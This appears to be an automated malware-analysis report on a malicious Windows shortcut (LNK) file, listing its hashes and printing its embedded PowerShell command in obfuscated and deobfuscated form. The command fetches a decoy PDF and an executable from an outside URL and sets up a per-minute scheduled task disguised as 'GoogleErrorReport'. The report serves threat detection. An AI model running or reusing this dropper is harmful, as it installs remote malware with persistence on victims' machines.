8930abf86e2e94b1a4b373e25d01f2ff
LNK File | MD5: 8930abf86e2e94b1a4b373e25d01f2ff | Size: 2.55 KB | application/x-ms-shortcut
Hash | Hash Value |
---|---|
MD5 | 8930abf86e2e94b1a4b373e25d01f2ff
|
Sha1 | 3a83ba1264291493a8fa39b4d343c0e1ee271974
|
Sha256 | 4466995be863ec4405fc053296cfe74d0098f94e61aa89c95fa2cc80c8ad6cb9
|
Sha384 | f94877f5797b14efc11614c949a28e39ea8b22f34cd21e8101d3999ba2b29664757075ba6dfb35861749470b2dccfb58
|
Sha512 | ebe5c0d7152ce8ed35e6a71c6436c0a1fbb929def0c417334136f69f86b1dfce002e906f7fce5e92e6ad9bc85fbde5a919c29600def19ec35f7980876ccb2faa
|
SSDeep | 48:8jBhv72LXXOrcOqhaMmOqhukesqAqL5dqoB6rHXv3QiYcs6N0:8jBdSLXOgdaMmdGcEQv9YbM
|
TLSH | 4151CE182AE11624F3F24B7954BB55C08D3ABD5EFE318E9C4291D54C0861A1AFC72F2F
|
Name0 | Value |
---|---|
LNK: Command Execution | conhost.exe powershell $ProgressPreference = 'SilentlyContinue';$b='C:\Users';iw''r https://jlu-edu.org/download/fetch/list1/18803/view/66e1c460-e71e-4dac-a35a-f2529b20e271 -OutFile $b\Public\89565254.pdf;s''a''p''s $b\Public\89565254.pdf;iw''r https://jlu-edu.org/download/fetch/list1/10884/view/fe35dfdc-e78f-4479-a142-3df61d6cbe6f -OutFile "$b\Public\hip";r''e''n -Path "$b\Public\hip" -NewName "$b\Public\Winver.exe";c''p''i "$b\Public\89565254.pdf" -destination .;sch''ta''s''ks /c''r''e''a''te /S''c minute /''t''n'' GoogleErrorReport /t''r "$b\Public\Winver" /f;e''r''a''s''e *d?.?n? |
Deobfuscated PowerShell | $ProgressPreference = "SilentlyContinue" $b = "C:\Users" Invoke-WebRequest "https://jlu-edu.org/download/fetch/list1/18803/view/66e1c460-e71e-4dac-a35a-f2529b20e271" -OutFile $b\Public\89565254.pdf saps $b\Public\89565254.pdf Invoke-WebRequest "https://jlu-edu.org/download/fetch/list1/10884/view/fe35dfdc-e78f-4479-a142-3df61d6cbe6f" -OutFile "$b\Public\hip" ren -Path "$b\Public\hip" -NewName "$b\Public\Winver.exe" cpi "$b\Public\89565254.pdf" -destination "." schtasks "/create" "/Sc" "minute" "/tn" "GoogleErrorReport" "/tr" "$b\Public\Winver" "/f" Remove-Item "*d?.?n?" |
Name0 | Value | Location |
---|---|---|
LNK: Command Execution | conhost.exe powershell $ProgressPreference = 'SilentlyContinue';$b='C:\Users';iw''r https://jlu-edu.org/download/fetch/list1/18803/view/66e1c460-e71e-4dac-a35a-f2529b20e271 -OutFile $b\Public\89565254.pdf;s''a''p''s $b\Public\89565254.pdf;iw''r https://jlu-edu.org/download/fetch/list1/10884/view/fe35dfdc-e78f-4479-a142-3df61d6cbe6f -OutFile "$b\Public\hip";r''e''n -Path "$b\Public\hip" -NewName "$b\Public\Winver.exe";c''p''i "$b\Public\89565254.pdf" -destination .;sch''ta''s''ks /c''r''e''a''te /S''c minute /''t''n'' GoogleErrorReport /t''r "$b\Public\Winver" /f;e''r''a''s''e *d?.?n? Malicious |
8930abf86e2e94b1a4b373e25d01f2ff |
Deobfuscated PowerShell | $ProgressPreference = "SilentlyContinue" $b = "C:\Users" Invoke-WebRequest "https://jlu-edu.org/download/fetch/list1/18803/view/66e1c460-e71e-4dac-a35a-f2529b20e271" -OutFile $b\Public\89565254.pdf saps $b\Public\89565254.pdf Invoke-WebRequest "https://jlu-edu.org/download/fetch/list1/10884/view/fe35dfdc-e78f-4479-a142-3df61d6cbe6f" -OutFile "$b\Public\hip" ren -Path "$b\Public\hip" -NewName "$b\Public\Winver.exe" cpi "$b\Public\89565254.pdf" -destination "." schtasks "/create" "/Sc" "minute" "/tn" "GoogleErrorReport" "/tr" "$b\Public\Winver" "/f" Remove-Item "*d?.?n?" Malicious |
8930abf86e2e94b1a4b373e25d01f2ff > LNK CommandLine > [PowerShell Command] |